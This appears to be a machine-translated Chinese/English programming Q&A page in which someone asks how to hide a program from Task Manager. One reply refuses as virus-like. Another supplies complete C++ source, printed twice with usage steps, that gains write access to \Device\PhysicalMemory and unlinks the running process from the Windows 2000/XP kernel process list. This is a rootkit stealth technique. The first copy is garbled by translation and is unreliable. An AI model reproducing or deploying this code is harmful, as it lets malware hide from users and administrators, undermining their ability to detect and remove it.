对任务管理器隐藏进程 [英] hide process from taskmanager
本文介绍了对任务管理器隐藏进程的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!
问题描述
大家好
我想为wm6.5创建一个程序,该程序未在任务管理器中显示
非常感谢
hey guys
i want to create a program for wm6.5 that does not shown in task manager
thanks alot
推荐答案
您不能.如果它正在运行,则任务管理器将看到它.期间.
正如Dave所说,您的动机令人怀疑.某人想要对任务管理器隐藏某些东西的唯一可行原因是,因为他入侵/编写了病毒,我们在这里不容忍这种行为.
You can''t. If it''s a running process, task manager will see it. Period.
As Dave already stated, your motives are suspect. The only viable reason someone would want to hide something from task manager is because he''s hacking/writing a virus, and we don''t condone that kind of behavior here.
标头文件:
/////////////////////////////////////
//HideProcess.h
BOOL HideProcess();
CPP:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include< windows.h>
#include< accctrl.h>
#include< aclapi.h>
#include"HideProcess.h"
#define NT_SUCCESS(状态)((NTSTATUS)(状态)> = 0)
#定义STATUS_INFO_LENGTH_MISMATCH((NTSTATUS] 0xC0000004L)
#定义STATUS_ACCESS_DENIED((NTSTATUS] 0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS状态; <br/> ULONG信息;
} IO_STATUS_BLOCK,* PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING
{
USHORT长度;
USHORT MaximumLength;
PWSTR缓冲区;
} UNICODE_STRING,* PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#定义OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES
{
ULONG长度;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG属性;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES,* POBJECT_ATTRIBUTES;
typedef NTSTATUS(CALLBACK * ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES对象属性
);
typedef VOID(CALLBACK * RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//------------------------------------------------ ---------------------------
BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary("ntdll.dll");
如果(NULL == g_hNtDLL)
返回FALSE;
RtlInitUnicodeString =(RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL,
"RtlInitUnicodeString");
ZwOpenSection =(ZWOPENSECTION)GetProcAddress(g_hNtDLL,"ZwOpenSection");
返回TRUE;
}
//------------------------------------------------ ---------------------------
无效的CloseNTDLL()
{
if(NULL!= g_hNtDLL)
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
}
//------------------------------------------------ ---------------------------
VOID SetPhysicalMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
DWORD dwRes = GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,
NULL& pDacl,NULL& pSD);
if(ERROR_SUCCESS!= dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
EXPLICIT_ACCESS ea;
RtlZeroMemory(& ea,sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName ="CURRENT_USER";
dwRes = SetEntriesInAcl(1,& ea,pDacl,& pNewDacl);
if(ERROR_SUCCESS!= dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo
(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
if(ERROR_SUCCESS!= dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
}
//------------------------------------------------ ---------------------------
处理OpenPhysicalMemory()
{
NTSTATUS状态; <br/> UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES属性;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(& g_osvi);
如果(5!= g_osvi.dwMajorVersion)
返回NULL;
开关(g_osvi.dwMinorVersion)
{
案例0:
PhyDirectory = 0x30000;
休息; //2k
情况1:
PhyDirectory = 0x39000;
休息; //xp
默认值:
返回NULL;
}
RtlInitUnicodeString(& physmemString,L"\\ Device \\ PhysicalMemory");
attribute.Length = sizeof(OBJECT_ATTRIBUTES);
attribute.RootDirectory = NULL;
attribute.ObjectName =& physmemString;
attribute.Attributes = 0;
attribute.SecurityDescriptor = NULL;
attribute.SecurityQualityOfService = NULL;
状态= ZwOpenSection(& g_hMPM,SECTION_MAP_READ | SECTION_MAP_WRITE,& attributes);
if(状态== STATUS_ACCESS_DENIED)
{
状态= ZwOpenSection(& g_hMPM,READ_CONTROL | WRITE_DAC,& attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
状态= ZwOpenSection(& g_hMPM,SECTION_MAP_READ | SECTION_MAP_WRITE,&属性);
}
if(!NT_SUCCESS(status))
返回NULL;
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM,FILE_MAP_READ | FILE_MAP_WRITE,0,PhyDirectory,
0x1000);
if(g_pMapPhysicalMemory == NULL)
返回NULL;
返回g_hMPM;
}
//------------------------------------------------ ---------------------------
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr =(ULONG)addr,PGDE,PTE,PAddr;
PGDE = BaseAddress [VAddr>> 22];
如果(0 ==(PGDE& 1))
返回0;
ULONG tmp = PGDE& 0x00000080;
如果(0!= tmp)
{
PAddr =(PGDE& 0xFFC00000)+(VAddr& 0x003FFFFF);
}
其他
{
PGDE =(ULONG)MapViewOfFile(g_hMPM,4,0,PGDE& 0xfffff000,0x1000);
PTE =((PULONG)PGDE)[(VAddr& 0x003FF000)>>>>>< 12 ;;
如果(0 ==(PTE& 1))
返回0;
PAddr =(PTE& 0xFFFFF000)+(VAddr& 0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return(PVOID)PAddr;
}
//------------------------------------------------ ---------------------------
ULONG GetData(PVOID地址)
{
ULONG phys =(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp =(PULONG)MapViewOfFile(g_hMPM,FILE_MAP_READ | FILE_MAP_WRITE,0,phys&
0xfffff000,0x1000);
如果(0 == tmp)
返回0;
ULONG ret = tmp [(phys& 0xFFF)>> 2];
UnmapViewOfFile(tmp);
返回ret;
}
//------------------------------------------------ ---------------------------
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys =(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp =(PULONG)MapViewOfFile(g_hMPM,FILE_MAP_WRITE,0,phys& 0xfffff000,0x1000);
如果(0 == tmp)
返回FALSE;
tmp [(phys& 0xFFF)>> 2] = data;
UnmapViewOfFile(tmp);
返回TRUE;
}
//------------------------------------------------ ---------------------------
长__stdcall感知(struct _EXCEPTION_POINTERS * tmp)
{
ExitProcess(0);
返回1;
}
//------------------------------------------------ ---------------------------
BOOL YHideProcess()
{
//SetUnhandledExceptionFilter(exeception);
如果(FALSE == InitNTDLL())
返回FALSE;
如果(0 == OpenPhysicalMemory())
返回FALSE;
ULONG线程= GetData((PVOID)0xFFDFF124); //kteb
ULONG进程= GetData(PVOID(thread + 0x44)); //kpeb
ULONG fw,bw;
如果(0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(进程+ 0xa4));
}
如果(1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
SetData(PVOID(fw + 4),bw);
SetData(PVOID(bw),fw);
CloseHandle(g_hMPM);
CloseNTDLL();
返回TRUE;
}
BOOL HideProcess()
{
静态BOOL b_hide = false;
如果(!b_hide)
{
b_hide = true;
YHideProcess();
返回true;
}
返回true;
}
在您的代码中:
#incoude"HideProcess.h",
然后调用HideProcess()
仅适用于Windows2000/xp
header file:
//////////////////////////////////////
//HideProcess.h
BOOL HideProcess();
CPP:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include<windows.h>
#include<accctrl.h>
#include<aclapi.h>
#include"HideProcess.h"
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary("ntdll.dll");
if (NULL == g_hNtDLL)
return FALSE;
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,
"RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
if(NULL != g_hNtDLL)
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,
NULL, &pDacl, NULL, &pSD);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo
(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
}
//---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);
if (5 != g_osvi.dwMajorVersion)
return NULL;
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
if(!NT_SUCCESS(status))
return NULL;
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,
0x1000);
if( g_pMapPhysicalMemory == NULL )
return NULL;
return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
PGDE = BaseAddress[VAddr>>22];
if (0 == (PGDE&1))
return 0;
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
return 0;
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &
0xfffff000, 0x1000);
if (0 == tmp)
return 0;
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (0 == tmp)
return FALSE;
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1 ;
}
//---------------------------------------------------------------------------
BOOL YHideProcess()
{
// SetUnhandledExceptionFilter(exeception);
if (FALSE == InitNTDLL())
return FALSE;
if (0 == OpenPhysicalMemory())
return FALSE;
ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}
if (1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);
CloseHandle(g_hMPM);
CloseNTDLL();
return TRUE;
}
BOOL HideProcess()
{
static BOOL b_hide = false;
if (!b_hide)
{
b_hide = true;
YHideProcess();
return true;
}
return true;
}
in your code :
#incoude"HideProcess.h",
then call HideProcess()
only worked for windows2000/xp
这篇关于对任务管理器隐藏进程的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
查看全文
